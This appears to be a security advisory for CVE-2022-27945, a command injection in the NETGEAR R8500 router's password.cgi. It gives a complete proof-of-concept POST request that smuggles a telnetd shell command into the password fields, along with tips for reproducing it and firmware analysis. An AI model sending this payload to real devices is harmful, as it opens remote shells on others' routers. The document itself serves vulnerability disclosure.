Headline
CVE-2022-27945: VUL/2.md at main · donothingme/VUL
NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the sysNewPasswd and sysConfirmPasswd parameters to password.cgi.
Netgear R8500 Router Vulnerability****Basic infomation
Vendor: Netgear
Product: R8500
Firmware version: V1.0.2.158
Firmware download link: https://www.downloads.netgear.com/files/GDC/R8500/R8500-V1.0.2.158_1.0.105.zip
Type:Remote Command Execution
author:donothingme
Vulnerability description
We found a Command Injection vulnerability in Netgear R8500 router, which allows an authenticated attacker to execute arbitrary OS commands by a crafted request.
In set password page(http://www.routerlogin.net/PWD_password.htm), we can set new password.
The sysNewPasswd and sysConfirmPasswd fields have a command injection vulnerability. If we set the two fields equal to %24%28telnetd+-l+%2Fbin%2Fsh+-p+44444+-b+0.0.0.0%29, we can actually execute command which $(telnetd -l /bin/sh -p 44444 -b 0.0.0.0).
The POC like follows:
POST /password.cgi?id=011b0b1ad47a66d6220c8cd546f41a553cafa50aaadb10fe3dd324af7225cf35 HTTP/1.1
Host: www.routerlogin.net
Proxy-Connection: keep-alive
Content-Length: 425
Cache-Control: max-age=0
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Upgrade-Insecure-Requests: 1
Origin: http://www.routerlogin.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.routerlogin.net/PWD_password.htm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cookie: XSRF_TOKEN=1222440606
buttonHit=cfAlert_Apply&buttonValue=%E5%BA%94%E7%94%A8&cfAlert_Apply=%E5%BA%94%E7%94%A8&sysOldPasswd=password&sysNewPasswd=%24%28telnetd+-l+%2Fbin%2Fsh+-p+44444+-b+0.0.0.0%29&sysConfirmPasswd=%24%28telnetd+-l+%2Fbin%2Fsh+-p+44444+-b+0.0.0.0%29&checkPassRec=1&question1=1&answer1=test&question2=1&answer2=test×tamp_value=Mon+Mar+21+2022+09%3A41%3A08+GMT%2B0800+%28%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4%29
And as we can see, after send the craft request, the command is actually executed, and we can get a shell.
Some tips to trigger vulnerability:
- Use IP address(192.168.1.1) instead of url(www.routerlogin.net) to access web page
- Plug in the USB stick to make sure reproduce successfunly
Firmware analysis
We can locate the vulnerability function by string "password.cgi".
In function sub_38944, the sysNewPasswd field is directly saved in nvram config, and this field is directly controlled by attackers.
The nvram value htt_passwd is used in many functions, and some functions use this value to execute function system(), so it will cause a command injection vulnerability.
